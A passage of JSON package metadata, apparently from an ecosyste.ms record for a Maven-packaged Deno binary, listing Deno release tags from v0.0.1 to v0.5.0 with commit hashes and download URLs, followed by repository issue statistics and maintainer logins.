me":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T13:54:32.801Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.517641743763917,"dependent_packages_count":45.05979389543345,"stargazers_count":0.019289227680756138,"forks_count":1.2980935813308854,"docker_downloads_count":null,"average":19.473704612052252},"purl":"pkg:maven/org.mvnpm.at.deno/darwin-x64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:darwin-x64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:darwin-x64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:darwin-x64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aa